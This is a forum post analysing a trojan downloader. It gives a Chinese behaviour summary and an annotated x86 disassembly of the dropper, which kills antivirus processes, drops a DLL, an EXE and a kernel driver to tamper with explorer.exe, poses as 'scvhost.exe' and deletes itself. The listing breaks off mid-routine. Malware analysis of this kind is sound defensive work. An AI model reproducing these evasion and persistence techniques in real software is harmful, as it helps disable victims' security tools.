[旧帖] [原创]找了一个有样本的木马下载者分析 0.00雪花
发表于: 2011-10-20 02:59 2235
病毒流程分析:
1、创建一个互斥体
2、停止ekrn服务,结束ekrn.exe,egui.exe进程。
3、释放动态库文件 "C:\WINDOWS\system32\44810500.dll",结束大量安全软件进程,劫持安全软件。
4、调用GetTickCount函数,根据开机时间生成一个EXE文件到WINDOWS目录(我的机器为:C:\WINDOWS\45757859.exe),45757859.exe是一个木马下载者
5、释放驱动文件pcidump.sys,创建服务启动驱动,修改gm.dls和explorer.exe,删除驱动文件
备注:分别创建 44810500.dll、pcidump.sys、45757859.exe主要文件
主体分析:
; ----------------------------------------------------------------------
; 00402230  dropper main routine (OllyDbg listing, Intel syntax, Win32)
; Cleans 10h bytes of args on return (retn 10) -- WinMain-shaped entry;
; the four args are never read here, so TODO confirm.
; Flow, as established by the calls below:
;   1. CreateMutexA("TGmae"); GetLastError()==0B7h (ERROR_ALREADY_EXISTS)
;      -> ExitProcess  (single-instance guard; mutex name is a useful IoC)
;   2. build <WinDir>\Explorer.EXE, <WinDir>\temp\Explorer.exe and
;      <SysDir>\drivers\gm.dls; if the running image's path equals
;      <WinDir>\Explorer.EXE, copy gm.dls to temp\Explorer.exe and "open" it
;   3. <设置权限> (privilege helper, not shown), CreateThread(00402220),
;      Sleep 5 s, 00401970 (kill named processes), 00401CE0 (drop DLL and
;      load it through rundll32.exe)
;   4. drop <SysDir>\<GetTickCount>.exe and "open" it
;      (NB: built from GetSystemDirectoryA, i.e. system32, not <WinDir>)
;   5. drop <SysDir>\drivers\pcidump.sys, 00401490 (start service),
;      00401650 (DeviceIoControl to the driver), 004015B0 (delete driver)
;   6. MoveFileExA(self -> <SysDir>\scvhost.exe); if not already running
;      as scvhost.exe or Explorer.EXE, 00401B70 (self-delete)
; Register roles: esi = lstrcatA (lstrcmpiA from 004027B7); ebp = Sleep;
;   ebx = 5Ch ('\') until 004025E1, then GetSystemDirectoryA;
;   edi = rep-stos target, lstrcpyA from 00402684.
; Buffers on the stack are zero-filled as 3Fh dwords + word + byte (0FFh
; bytes) before each 0FFh-sized API call; file names are built one byte
; at a time (string-hiding, the same pattern in every routine below).
; Returns eax = 0.
; ----------------------------------------------------------------------
00402230 . 81EC 680B0000 sub esp, 0B68 ; (Initial CPU selection)
00402236 . 53 push ebx
00402237 . 55 push ebp
00402238 . 56 push esi
00402239 . 57 push edi
0040223A . B9 3F000000 mov ecx, 3F
0040223F . 33C0 xor eax, eax
00402241 . 8DBC24 74050000 lea edi, dword ptr [esp+574]
00402248 . 68 E0134000 push 004013E0 ; /TGmae...  MutexName (CreateMutexA arg pushed early, interleaved with buffer clearing)
0040224D . F3:AB rep stos dword ptr es:[edi] ; |
0040224F . 66:AB stos word ptr es:[edi] ; |
00402251 . AA stos byte ptr es:[edi] ; |
00402252 . B9 3F000000 mov ecx, 3F ; |
00402257 . 33C0 xor eax, eax ; |
00402259 . 8DBC24 78070000 lea edi, dword ptr [esp+778] ; |
00402260 . B3 5C mov bl, 5C ; | bl = '\' -- reused as path separator in every byte-built string
00402262 . F3:AB rep stos dword ptr es:[edi] ; |
00402264 . 66:AB stos word ptr es:[edi] ; |
00402266 . AA stos byte ptr es:[edi] ; |
00402267 . B9 3F000000 mov ecx, 3F ; |
0040226C . 33C0 xor eax, eax ; |
0040226E . 8DBC24 78060000 lea edi, dword ptr [esp+678] ; |
00402275 . 6A 00 push 0 ; |InitialOwner = FALSE
00402277 . F3:AB rep stos dword ptr es:[edi] ; |
00402279 . 66:AB stos word ptr es:[edi] ; |
0040227B . AA stos byte ptr es:[edi] ; |
0040227C . B9 3F000000 mov ecx, 3F ; |
00402281 . 33C0 xor eax, eax ; |
00402283 . 8D7C24 78 lea edi, dword ptr [esp+78] ; |
00402287 . 6A 00 push 0 ; |pSecurity = NULL
00402289 . F3:AB rep stos dword ptr es:[edi] ; |
0040228B . 66:AB stos word ptr es:[edi] ; |
0040228D . 885C24 24 mov byte ptr [esp+24], bl ; | builds "\Explorer.EXE" (NUL-terminated) -- this is the StringToAdd used at 00402318
00402291 . C64424 25 45 mov byte ptr [esp+25], 45 ; |
00402296 . C64424 26 78 mov byte ptr [esp+26], 78 ; |
0040229B . C64424 27 70 mov byte ptr [esp+27], 70 ; |
004022A0 . C64424 28 6C mov byte ptr [esp+28], 6C ; |
004022A5 . C64424 29 6F mov byte ptr [esp+29], 6F ; |
004022AA . C64424 2A 72 mov byte ptr [esp+2A], 72 ; |
004022AF . C64424 2B 65 mov byte ptr [esp+2B], 65 ; |
004022B4 . C64424 2C 72 mov byte ptr [esp+2C], 72 ; |
004022B9 . C64424 2D 2E mov byte ptr [esp+2D], 2E ; |
004022BE . C64424 2E 45 mov byte ptr [esp+2E], 45 ; |
004022C3 . C64424 2F 58 mov byte ptr [esp+2F], 58 ; |
004022C8 . C64424 30 45 mov byte ptr [esp+30], 45 ; |
004022CD . C64424 31 00 mov byte ptr [esp+31], 0 ; |
004022D2 . AA stos byte ptr es:[edi] ; |
004022D3 . FF15 84104000 call dword ptr [401084] ; \CreateMutexA  named mutex "TGmae": single-instance guard
004022D9 . FF15 80104000 call dword ptr [401080] ; ntdll.RtlGetLastWin32Error
004022DF . 3D B7000000 cmp eax, 0B7 ; ERROR_ALREADY_EXISTS -> another instance is running
004022E4 . 75 08 jnz short 004022EE
004022E6 . 6A 00 push 0 ; /ExitCode = 0
004022E8 . FF15 54104000 call dword ptr [401054] ; \ExitProcess
; --- step 2: build the Explorer / gm.dls paths and compare with own image
004022EE > 8B35 7C104000 mov esi, dword ptr [40107C] ; kernel32.GetWindowsDirectoryA
004022F4 . 8D8424 74060000 lea eax, dword ptr [esp+674]
004022FB . 68 FF000000 push 0FF ; /BufSize = FF (255.)
00402300 . 50 push eax ; |Buffer
00402301 . FFD6 call esi ; \GetWindowsDirectoryA
00402303 . 8D8C24 74050000 lea ecx, dword ptr [esp+574]
0040230A . 68 FF000000 push 0FF ; /BufSize = FF (255.)
0040230F . 51 push ecx ; |Buffer
00402310 . FFD6 call esi ; \GetWindowsDirectoryA
00402312 . 8B35 94104000 mov esi, dword ptr [401094] ; kernel32.lstrcatA
00402318 . 8D5424 18 lea edx, dword ptr [esp+18]
0040231C . 8D8424 74050000 lea eax, dword ptr [esp+574]
00402323 . 52 push edx ; /StringToAdd
00402324 . 50 push eax ; |ConcatString
00402325 . FFD6 call esi ; \lstrcatA
00402327 . 8D8C24 74070000 lea ecx, dword ptr [esp+774] ; previous lstrcatA: [esp+574] = "<WinDir>\Explorer.EXE" (analyst: C:\WINDOWS\Explorer.EXE)
0040232E . 68 FF000000 push 0FF ; /BufSize = FF (255.)
00402333 . 51 push ecx ; |Buffer
00402334 . 885C24 4C mov byte ptr [esp+4C], bl ; | builds "\temp\Explorer.exe" -- StringToAdd used at 00402413
00402338 . C64424 4D 74 mov byte ptr [esp+4D], 74 ; |
0040233D . C64424 4E 65 mov byte ptr [esp+4E], 65 ; |
00402342 . C64424 4F 6D mov byte ptr [esp+4F], 6D ; |
00402347 . C64424 50 70 mov byte ptr [esp+50], 70 ; |
0040234C . 885C24 51 mov byte ptr [esp+51], bl ; |
00402350 . C64424 52 45 mov byte ptr [esp+52], 45 ; |
00402355 . C64424 53 78 mov byte ptr [esp+53], 78 ; |
0040235A . C64424 54 70 mov byte ptr [esp+54], 70 ; |
0040235F . C64424 55 6C mov byte ptr [esp+55], 6C ; |
00402364 . C64424 56 6F mov byte ptr [esp+56], 6F ; |
00402369 . C64424 57 72 mov byte ptr [esp+57], 72 ; |
0040236E . C64424 58 65 mov byte ptr [esp+58], 65 ; |
00402373 . C64424 59 72 mov byte ptr [esp+59], 72 ; |
00402378 . C64424 5A 2E mov byte ptr [esp+5A], 2E ; |
0040237D . C64424 5B 65 mov byte ptr [esp+5B], 65 ; |
00402382 . C64424 5C 78 mov byte ptr [esp+5C], 78 ; |
00402387 . C64424 5D 65 mov byte ptr [esp+5D], 65 ; |
0040238C . C64424 5E 00 mov byte ptr [esp+5E], 0 ; |
00402391 . FF15 90104000 call dword ptr [401090] ; \GetSystemDirectoryA
00402397 . 8D5424 70 lea edx, dword ptr [esp+70]
0040239B . 68 FF000000 push 0FF ; /BufSize = FF (255.)
004023A0 . 52 push edx ; |PathBuffer
004023A1 . 6A 00 push 0 ; |hModule = NULL
004023A3 . 885C24 40 mov byte ptr [esp+40], bl ; | builds "\drivers\gm.dls" -- StringToAdd used at 00402422
004023A7 . C64424 41 64 mov byte ptr [esp+41], 64 ; |
004023AC . C64424 42 72 mov byte ptr [esp+42], 72 ; |
004023B1 . C64424 43 69 mov byte ptr [esp+43], 69 ; |
004023B6 . C64424 44 76 mov byte ptr [esp+44], 76 ; |
004023BB . C64424 45 65 mov byte ptr [esp+45], 65 ; |
004023C0 . C64424 46 72 mov byte ptr [esp+46], 72 ; |
004023C5 . C64424 47 73 mov byte ptr [esp+47], 73 ; |
004023CA . 885C24 48 mov byte ptr [esp+48], bl ; |
004023CE . C64424 49 67 mov byte ptr [esp+49], 67 ; |
004023D3 . C64424 4A 6D mov byte ptr [esp+4A], 6D ; |
004023D8 . C64424 4B 2E mov byte ptr [esp+4B], 2E ; |
004023DD . C64424 4C 64 mov byte ptr [esp+4C], 64 ; |
004023E2 . C64424 4D 6C mov byte ptr [esp+4D], 6C ; |
004023E7 . C64424 4E 73 mov byte ptr [esp+4E], 73 ; |
004023EC . C64424 4F 00 mov byte ptr [esp+4F], 0 ; |
004023F1 . FF15 58104000 call dword ptr [401058] ; \GetModuleFileNameA  [esp+70] = path of the running image
004023F7 . 8D8424 74050000 lea eax, dword ptr [esp+574] ; C:\trojan\trojan\412489_fm01.exe
004023FE . 8D4C24 70 lea ecx, dword ptr [esp+70]
00402402 . 50 push eax ; /0012F448 0012F9C0 \String2 = "C:\WINDOWS\Explorer.EXE"
00402403 . 51 push ecx ; |0012F444 0012F4BC |String1 = "C:\trojan\trojan\412489_fm01.exe"
00402404 . FF15 48104000 call dword ptr [401048] ; \lstrcmpiA
0040240A . 85C0 test eax, eax
0040240C . 75 5B jnz short 00402469 ; am I running as <WinDir>\Explorer.EXE? equal: fall through; otherwise skip to 00402469
0040240E . A2 78124000 mov byte ptr [401278], al ; global flag := 0 (eax is 0 here); read back by 00401650 -- initial value of [401278] is not in the listing
00402413 . 8D5424 44 lea edx, dword ptr [esp+44]
00402417 . 8D8424 74060000 lea eax, dword ptr [esp+674]
0040241E . 52 push edx ; /StringToAdd
0040241F . 50 push eax ; |ConcatString
00402420 . FFD6 call esi ; \lstrcatA
00402422 . 8D4C24 34 lea ecx, dword ptr [esp+34] ; previous lstrcatA: [esp+674] = "<WinDir>\temp\Explorer.exe" (analyst: C:\WINDOWS\temp\Explorer.exe)
00402426 . 8D9424 74070000 lea edx, dword ptr [esp+774]
0040242D . 51 push ecx ; /StringToAdd
0040242E . 52 push edx ; |ConcatString
0040242F . FFD6 call esi ; \lstrcatA
00402431 . 8D8424 74060000 lea eax, dword ptr [esp+674] ; previous lstrcatA: [esp+774] = "<SysDir>\drivers\gm.dls" (analyst: C:\WINDOWS\system32\drivers\gm.dls)
00402438 . 6A 00 push 0 ; /FailIfExists = FALSE
0040243A . 8D8C24 78070000 lea ecx, dword ptr [esp+778] ; |
00402441 . 50 push eax ; |NewFileName
00402442 . 51 push ecx ; |ExistingFileName
00402443 . FF15 78104000 call dword ptr [401078] ; \CopyFileA
00402449 . 6A 00 push 0 ; copies <SysDir>\drivers\gm.dls to <WinDir>\temp\Explorer.exe (gm.dls is presumably the saved original explorer -- not provable from this listing)
0040244B . 6A 00 push 0
0040244D . 8D9424 7C060000 lea edx, dword ptr [esp+67C]
00402454 . 68 E4104000 push 004010E4
00402459 . 52 push edx
0040245A . 68 C8124000 push 004012C8 ; open
0040245F . 6A 00 push 0
00402461 . E8 DAEFFFFF call <动态获得函数地址并运行文件> ; 6 args (0, "open", file, 004010E4, 0, 0) -- a ShellExecuteA-shaped call; the helper resolves the API at run time and is not in the listing
00402466 . 83C4 18 add esp, 18 ; caller cleans 18h bytes -> helper is cdecl
; --- step 3: privileges, worker thread, AV-killer and DLL drop
00402469 > E8 D2F9FFFF call <设置权限> ; privilege-adjust helper (not in listing)
0040246E . 6A 00 push 0 ; /pThreadId = NULL
00402470 . 6A 00 push 0 ; |CreationFlags = 0
00402472 . 6A 00 push 0 ; |pThreadParm = NULL
00402474 . 68 20224000 push 00402220 ; |ThreadFunction = 412489_f.00402220 (body not in listing)
00402479 . 6A 00 push 0 ; |StackSize = 0
0040247B . 6A 00 push 0 ; |pSecurity = NULL
0040247D . FF15 74104000 call dword ptr [401074] ; \CreateThread
00402483 . 8B2D 9C104000 mov ebp, dword ptr [40109C] ; kernel32.Sleep
00402489 . 68 88130000 push 1388 ; /Timeout = 5000. ms
0040248E . FFD5 call ebp ; \Sleep
00402490 . E8 DBF4FFFF call 00401970 ; key call 1: terminate named (security-product) processes -- listed below
00402495 . 68 E8030000 push 3E8
0040249A . FFD5 call ebp ; kernel32.Sleep
0040249C . E8 3FF8FFFF call 00401CE0 ; key call 2: drop <tick>.dll and run "rundll32.exe <dll> testall" -- listed below; NB it uses GetTempPathA, so the DLL lands in %TEMP%, not system32 as the summary says
004024A1 . 68 E8030000 push 3E8
004024A6 . FFD5 call ebp ; kernel32.Sleep
; --- step 4: drop and run <SysDir>\<GetTickCount>.exe (the downloader)
004024A8 . B9 3F000000 mov ecx, 3F
004024AD . 33C0 xor eax, eax
004024AF . 8DBC24 70030000 lea edi, dword ptr [esp+370]
004024B6 . 68 FF000000 push 0FF ; /BufSize = FF (255.)
004024BB . F3:AB rep stos dword ptr es:[edi] ; |
004024BD . 66:AB stos word ptr es:[edi] ; |
004024BF . AA stos byte ptr es:[edi] ; |
004024C0 . B9 3F000000 mov ecx, 3F ; |
004024C5 . 33C0 xor eax, eax ; |
004024C7 . 8DBC24 78090000 lea edi, dword ptr [esp+978] ; |
004024CE . F3:AB rep stos dword ptr es:[edi] ; |
004024D0 . 66:AB stos word ptr es:[edi] ; |
004024D2 . AA stos byte ptr es:[edi] ; |
004024D3 . 8D8424 74030000 lea eax, dword ptr [esp+374] ; |
004024DA . 50 push eax ; |Buffer
004024DB . FF15 90104000 call dword ptr [401090] ; \GetSystemDirectoryA  (system32 -- the summary's "WINDOWS directory" does not match this call)
004024E1 . FF15 68104000 call dword ptr [401068] ; [GetTickCount  -- file name = uptime in ms, so it differs per infection; do not pin detections to "45757859"
004024E7 . 50 push eax ; /<%d>
004024E8 . 8D8C24 78090000 lea ecx, dword ptr [esp+978] ; |
004024EF . 68 D8134000 push 004013D8 ; |%d.exe
004024F4 . 51 push ecx ; |s
004024F5 . FF15 DC104000 call dword ptr [4010DC] ; \wsprintfA
004024FB . 83C4 0C add esp, 0C
004024FE . 8D9424 70030000 lea edx, dword ptr [esp+370]
00402505 . 68 D4134000 push 004013D4 ; \
0040250A . 52 push edx
0040250B . FFD6 call esi ; kernel32.lstrcatA
0040250D . 8D8424 74090000 lea eax, dword ptr [esp+974]
00402514 . 8D8C24 70030000 lea ecx, dword ptr [esp+370]
0040251B . 50 push eax
0040251C . 51 push ecx
0040251D . FFD6 call esi ; kernel32.lstrcatA
0040251F . 8D9424 70030000 lea edx, dword ptr [esp+370] ; C:\WINDOWS\system32\45757859.exe
00402526 . 6A 65 push 65 ; 65h -- selector passed to <创建文件> (resource id? helper not in listing)
00402528 . 52 push edx
00402529 . E8 02F3FFFF call <创建文件> 创建文件C:\WINDOWS\system32\45757859.exe ; writes the file at the path in edx
0040252E . 6A 00 push 0
00402530 . 6A 00 push 0
00402532 . 8D8424 78030000 lea eax, dword ptr [esp+378]
00402539 . 68 E4104000 push 004010E4
0040253E . 50 push eax
0040253F . 68 C8124000 push 004012C8 ; open
00402544 . 6A 00 push 0
00402546 . E8 F5EEFFFF call <动态获得函数地址并运行文件> ; same ShellExecuteA-shaped "open" as at 00402461, on the dropped .exe
0040254B . 83C4 18 add esp, 18
0040254E . 68 E8030000 push 3E8
00402553 . FFD5 call ebp
; --- step 5: drop the kernel driver and talk to it
00402555 . 885C24 58 mov byte ptr [esp+58], bl ; \drivers\pcidump  ("." follows at [esp+68]; "sys" is written at 0040260A.. below)
00402559 . C64424 59 64 mov byte ptr [esp+59], 64
0040255E . C64424 5A 72 mov byte ptr [esp+5A], 72
00402563 . C64424 5B 69 mov byte ptr [esp+5B], 69
00402568 . C64424 5C 76 mov byte ptr [esp+5C], 76
0040256D . C64424 5D 65 mov byte ptr [esp+5D], 65
00402572 . C64424 5E 72 mov byte ptr [esp+5E], 72
00402577 . C64424 5F 73 mov byte ptr [esp+5F], 73
0040257C . 885C24 60 mov byte ptr [esp+60], bl
00402580 . C64424 61 70 mov byte ptr [esp+61], 70
00402585 . C64424 62 63 mov byte ptr [esp+62], 63
0040258A . C64424 63 69 mov byte ptr [esp+63], 69
0040258F . C64424 64 64 mov byte ptr [esp+64], 64
00402594 . C64424 65 75 mov byte ptr [esp+65], 75
00402599 . C64424 66 6D mov byte ptr [esp+66], 6D
0040259E . C64424 67 70 mov byte ptr [esp+67], 70
004025A3 . C64424 68 2E mov byte ptr [esp+68], 2E
004025A8 . B9 3F000000 mov ecx, 3F
004025AD . 33C0 xor eax, eax
004025AF . 8D7C24 70 lea edi, dword ptr [esp+70]
004025B3 . 885C24 10 mov byte ptr [esp+10], bl ; start of a short prefix string ('\', then '\' at +13, "??" at +19/+1A, NUL at +1C) -- analyst reads the result as "\??\"
004025B7 . F3:AB rep stos dword ptr es:[edi]
004025B9 . 66:AB stos word ptr es:[edi]
004025BB . AA stos byte ptr es:[edi]
004025BC . B9 3F000000 mov ecx, 3F
004025C1 . 33C0 xor eax, eax
004025C3 . 8DBC24 74040000 lea edi, dword ptr [esp+474]
004025CA . 885C24 13 mov byte ptr [esp+13], bl
004025CE . F3:AB rep stos dword ptr es:[edi]
004025D0 . 66:AB stos word ptr es:[edi]
004025D2 . AA stos byte ptr es:[edi]
004025D3 . B9 3F000000 mov ecx, 3F
004025D8 . 33C0 xor eax, eax
004025DA . 8DBC24 74080000 lea edi, dword ptr [esp+874]
004025E1 . 8B1D 90104000 mov ebx, dword ptr [401090] ; kernel32.GetSystemDirectoryA  -- ebx no longer holds '\' from here on
004025E7 . F3:AB rep stos dword ptr es:[edi]
004025E9 . 66:AB stos word ptr es:[edi]
004025EB . AA stos byte ptr es:[edi]
004025EC . B9 3F000000 mov ecx, 3F
004025F1 . 33C0 xor eax, eax
004025F3 . 8DBC24 70020000 lea edi, dword ptr [esp+270]
004025FA . 68 FF000000 push 0FF ; /BufSize = FF (255.)
004025FF . F3:AB rep stos dword ptr es:[edi] ; |
00402601 . 66:AB stos word ptr es:[edi] ; |
00402603 . 8D8C24 74020000 lea ecx, dword ptr [esp+274] ; |
0040260A . C64424 6D 73 mov byte ptr [esp+6D], 73 ; | 's' -> completes "\drivers\pcidump.sys"
0040260F . 51 push ecx ; |Buffer
00402610 . C64424 72 79 mov byte ptr [esp+72], 79 ; | 'y'
00402615 . C64424 73 73 mov byte ptr [esp+73], 73 ; | 's'
0040261A . C64424 74 00 mov byte ptr [esp+74], 0 ; |
0040261F . C64424 19 3F mov byte ptr [esp+19], 3F ; | '?'
00402624 . C64424 1A 3F mov byte ptr [esp+1A], 3F ; | '?'
00402629 . C64424 1C 00 mov byte ptr [esp+1C], 0 ; |
0040262E . AA stos byte ptr es:[edi] ; |
0040262F . FFD3 call ebx ; \GetSystemDirectoryA
00402631 . 8D5424 58 lea edx, dword ptr [esp+58]
00402635 . 8D8424 70020000 lea eax, dword ptr [esp+270]
0040263C . 52 push edx
0040263D . 50 push eax
0040263E . FFD6 call esi ; lstrcatA: [esp+270] = "<SysDir>\drivers\pcidump.sys"
00402640 . 8D4C24 70 lea ecx, dword ptr [esp+70]
00402644 . 68 FF000000 push 0FF ; /BufSize = FF (255.)
00402649 . 51 push ecx ; |PathBuffer
0040264A . 6A 00 push 0 ; |hModule = NULL
0040264C . FF15 58104000 call dword ptr [401058] ; \GetModuleFileNameA
00402652 . 8D9424 70020000 lea edx, dword ptr [esp+270]
00402659 . 6A 67 push 67 ; 67h -- selector for <创建文件> (cf. 65h for the .exe, 66h for the .dll)
0040265B . 52 push edx
0040265C . E8 CFF1FFFF call <创建文件> ; writes "<SysDir>\drivers\pcidump.sys" (analyst: C:\WINDOWS\system32\drivers\pcidump.sys)
00402661 . 8D8424 70020000 lea eax, dword ptr [esp+270]
00402668 . 50 push eax
00402669 . E8 22EEFFFF call 00401490 ; create/start the driver service for pcidump.sys (routine not in listing)
0040266E . 83C4 04 add esp, 4
00402671 . 8D8C24 780A0000 lea ecx, dword ptr [esp+A78]
00402678 . 68 FF000000 push 0FF ; /BufSize = FF (255.)
0040267D . 51 push ecx ; |Buffer
0040267E . FF15 7C104000 call dword ptr [40107C] ; \GetWindowsDirectoryA
00402684 . 8B3D 8C104000 mov edi, dword ptr [40108C] ; kernel32.lstrcpyA
0040268A . 8D5424 10 lea edx, dword ptr [esp+10]
0040268E . 8D8424 74040000 lea eax, dword ptr [esp+474]
00402695 . 52 push edx ; /String2
00402696 . 50 push eax ; |String1
00402697 . FFD7 call edi ; \lstrcpyA  [esp+474] = prefix ("\??\")
00402699 . 8D8C24 780A0000 lea ecx, dword ptr [esp+A78]
004026A0 . 8D9424 74040000 lea edx, dword ptr [esp+474]
004026A7 . 51 push ecx
004026A8 . 52 push edx
004026A9 . FFD6 call esi ; lstrcatA  += <WinDir>
004026AB . 8D4424 18 lea eax, dword ptr [esp+18]
004026AF . 8D8C24 74040000 lea ecx, dword ptr [esp+474]
004026B6 . 50 push eax
004026B7 . 51 push ecx
004026B8 . FFD6 call esi ; lstrcatA  += "\Explorer.EXE"  -> arg1 for 00401650 (analyst: "\??\C:\WINDOWS\Explorer.EXE")
004026BA . 8D5424 10 lea edx, dword ptr [esp+10]
004026BE . 8D8424 74080000 lea eax, dword ptr [esp+874]
004026C5 . 52 push edx
004026C6 . 50 push eax
004026C7 . FFD7 call edi ; lstrcpyA  [esp+874] = prefix
004026C9 . 8D4C24 70 lea ecx, dword ptr [esp+70]
004026CD . 8D9424 74080000 lea edx, dword ptr [esp+874]
004026D4 . 51 push ecx
004026D5 . 52 push edx
004026D6 . FFD6 call esi ; lstrcatA  += own image path -> arg2 for 00401650
004026D8 . 8D8424 74080000 lea eax, dword ptr [esp+874]
004026DF . 8D8C24 74040000 lea ecx, dword ptr [esp+474]
004026E6 . 50 push eax
004026E7 . 51 push ecx
004026E8 . E8 63EFFFFF call 00401650 ; key call 3: DeviceIoControl(\\.\pcidump) with these two paths -- listed below; the analyst reads it as swapping gm.dls/explorer.exe
004026ED . 8D9424 78020000 lea edx, dword ptr [esp+278]
004026F4 . 52 push edx
004026F5 . E8 B6EEFFFF call 004015B0 ; delete the driver file (routine not in listing)
004026FA . 83C4 0C add esp, 0C ; cleans 2 args of 00401650 + 1 of 004015B0 -> both cdecl
004026FD . 68 E8030000 push 3E8
00402702 . FFD5 call ebp ; kernel32.Sleep
; --- step 6: relocate self to <SysDir>\scvhost.exe, then self-delete
00402704 . B9 3F000000 mov ecx, 3F
00402709 . 33C0 xor eax, eax
0040270B . 8D7C24 70 lea edi, dword ptr [esp+70]
0040270F . 68 FF000000 push 0FF ; /BufSize = FF (255.)
00402714 . F3:AB rep stos dword ptr es:[edi] ; |
00402716 . 66:AB stos word ptr es:[edi] ; |
00402718 . AA stos byte ptr es:[edi] ; |
00402719 . B9 3F000000 mov ecx, 3F ; |
0040271E . 33C0 xor eax, eax ; |
00402720 . 8DBC24 74010000 lea edi, dword ptr [esp+174] ; |
00402727 . C64424 2C 73 mov byte ptr [esp+2C], 73 ; | 's'
0040272C . F3:AB rep stos dword ptr es:[edi] ; |
0040272E . 66:AB stos word ptr es:[edi] ; |
00402730 . AA stos byte ptr es:[edi] ; |
00402731 . 8D4424 74 lea eax, dword ptr [esp+74] ; |
00402735 . C64424 2D 63 mov byte ptr [esp+2D], 63 ; | 'c'
0040273A . 50 push eax ; |PathBuffer
0040273B . 6A 00 push 0 ; |hModule = NULL
0040273D . C64424 36 76 mov byte ptr [esp+36], 76 ; | builds "scvhost.exe" (bytes 73 63 76 68 6F 73 74 2E 65 78 65 -- note "scv", a look-alike of svchost.exe)
00402742 . C64424 37 68 mov byte ptr [esp+37], 68 ; |
00402747 . C64424 38 6F mov byte ptr [esp+38], 6F ; |
0040274C . C64424 39 73 mov byte ptr [esp+39], 73 ; |
00402751 . C64424 3A 74 mov byte ptr [esp+3A], 74 ; |
00402756 . C64424 3B 2E mov byte ptr [esp+3B], 2E ; |
0040275B . C64424 3C 65 mov byte ptr [esp+3C], 65 ; |
00402760 . C64424 3D 78 mov byte ptr [esp+3D], 78 ; |
00402765 . C64424 3E 65 mov byte ptr [esp+3E], 65 ; |
0040276A . C64424 3F 00 mov byte ptr [esp+3F], 0 ; |
0040276F . FF15 58104000 call dword ptr [401058] ; \GetModuleFileNameA
00402775 . 8D8C24 70010000 lea ecx, dword ptr [esp+170]
0040277C . 68 FF000000 push 0FF
00402781 . 51 push ecx
00402782 . FFD3 call ebx ; GetSystemDirectoryA
00402784 . 8D9424 70010000 lea edx, dword ptr [esp+170]
0040278B . 68 D4134000 push 004013D4 ; \
00402790 . 52 push edx
00402791 . FFD6 call esi ; kernel32.lstrcatA
00402793 . 8D4424 28 lea eax, dword ptr [esp+28]
00402797 . 8D8C24 70010000 lea ecx, dword ptr [esp+170]
0040279E . 50 push eax ; // "scvhost.exe"
0040279F . 51 push ecx ; "C:\WINDOWS\system32\"
004027A0 . FFD6 call esi
004027A2 . 8D9424 70010000 lea edx, dword ptr [esp+170] ; moves own image (analyst: "C:\trojan\trojan\412489_fm01.exe") to "<SysDir>\scvhost.exe"
004027A9 . 6A 01 push 1 ; /Flags = REPLACE_EXISTING
004027AB . 8D4424 74 lea eax, dword ptr [esp+74] ; |
004027AF . 52 push edx ; |0012F444 0012F5BC |NewName = "C:\WINDOWS\system32\scvhost.exe"
004027B0 . 50 push eax ; |0012F440 0012F4BC |ExistingName = "C:\trojan\trojan\412489_fm01.exe"
004027B1 . FF15 70104000 call dword ptr [401070] ; \MoveFileExA  (return value not checked)
004027B7 . 8B35 48104000 mov esi, dword ptr [401048] ; kernel32.lstrcmpiA
004027BD . 8D8C24 70010000 lea ecx, dword ptr [esp+170]
004027C4 . 8D5424 70 lea edx, dword ptr [esp+70]
004027C8 . 51 push ecx ; /String2
004027C9 . 52 push edx ; |String1
004027CA . FFD6 call esi ; \lstrcmpiA  own path == <SysDir>\scvhost.exe ?
004027CC . 85C0 test eax, eax
004027CE . 74 18 je short 004027E8 ; already the relocated copy -> no self-delete
004027D0 . 8D8424 74050000 lea eax, dword ptr [esp+574]
004027D7 . 8D4C24 70 lea ecx, dword ptr [esp+70]
004027DB . 50 push eax ; /0012F448 0012F9C0 \String2 = "C:\WINDOWS\Explorer.EXE"
004027DC . 51 push ecx ; |0012F444 0012F4BC |String1 = "C:\trojan\trojan\412489_fm01.exe"
004027DD . FFD6 call esi ; \lstrcmpiA  own path == <WinDir>\Explorer.EXE ?
004027DF . 85C0 test eax, eax
004027E1 . 74 05 je short 004027E8 ; running as Explorer.EXE -> no self-delete
004027E3 . E8 88F3FFFF call 00401B70 ; key call 4: self-delete via a dropped batch file (00401B70, below)
004027E8 > 5F pop edi
004027E9 . 5E pop esi
004027EA . 5D pop ebp
004027EB . 33C0 xor eax, eax ; return 0
004027ED . 5B pop ebx
004027EE . 81C4 680B0000 add esp, 0B68
004027F4 . C2 1000 retn 10
关键call 1
; ----------------------------------------------------------------------
; 00401970  key call 1: kill security-product processes
; No arguments (caller does not clean the stack). Builds several strings
; byte-wise on the stack (that part is elided as "......" in the listing),
; then:
;   - 004018F0("ekrn.exe")  -- terminate-by-name helper, not in listing;
;     the caller's summary also names egui.exe, which would be among the
;     elided bytes -- cannot be confirmed here
;   - if that returned non-zero, three ShellExecuteA-shaped "open" calls on
;     the stack strings at [esp+0], [esp+30] and [esp+68] (pre-push
;     offsets); the summary says these stop the ekrn service -- the
;     strings themselves are not visible, so treat as unconfirmed
;   - Sleep 500 ms
; Registers: bl/al/dl/cl hold constant bytes 'c',' ','/','e' used to
; populate the strings; ebx is saved/restored.
; Returns: eax = value left by the last call (not explicitly set).
; ----------------------------------------------------------------------
00401970 /$ 83EC 58 sub esp, 58
00401973 |. 53 push ebx
00401974 |. B3 63 mov bl, 63 ; 'c'
00401976 |. B0 20 mov al, 20 ; ' '
00401978 |. B2 2F mov dl, 2F ; '/'
0040197A |. B1 65 mov cl, 65 ; 'e'
0040197C |. 885C24 04 mov byte ptr [esp+4], bl
......
00401AD1 |. C64424 52 75 mov byte ptr [esp+52], 75
00401AD6 |. 68 D0124000 push 004012D0 ; ekrn.exe
00401ADB |. C64424 57 69 mov byte ptr [esp+57], 69
00401AE0 |. C64424 58 2E mov byte ptr [esp+58], 2E
00401AE5 |. 884C24 59 mov byte ptr [esp+59], cl
00401AE9 |. C64424 5A 78 mov byte ptr [esp+5A], 78
00401AEE |. 884C24 5B mov byte ptr [esp+5B], cl
00401AF2 |. 884424 5C mov byte ptr [esp+5C], al
00401AF6 |. 885424 5D mov byte ptr [esp+5D], dl
00401AFA |. C64424 5E 66 mov byte ptr [esp+5E], 66
00401AFF |. E8 ECFDFFFF call 004018F0 ; terminate process by name ("ekrn.exe"); routine not in listing
00401B04 |. 83C4 04 add esp, 4 ; cdecl: 1 arg
00401B07 |. 85C0 test eax, eax
00401B09 |. 5B pop ebx
00401B0A |. 74 5C je short 00401B68 ; nothing killed -> skip the three "open" commands
00401B0C |. 6A 00 push 0
00401B0E |. 6A 00 push 0
